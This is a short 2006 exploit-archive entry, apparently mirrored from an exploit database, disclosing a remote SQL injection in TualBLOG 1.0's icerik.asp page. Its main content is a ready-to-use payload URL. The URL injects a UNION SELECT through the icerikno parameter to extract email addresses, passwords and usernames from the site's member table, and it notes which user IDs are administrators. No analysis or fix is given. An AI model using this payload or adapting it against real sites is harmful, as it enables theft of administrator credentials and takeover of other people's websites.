[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability
# Published : 2006-09-13
# Author : RMx
# Previous Title : Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability
# Next Title : Magic News Pro <= 1.0.3 (script_path) Remote File Include Vulnerability
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# www.Syue.com [2006-09-13]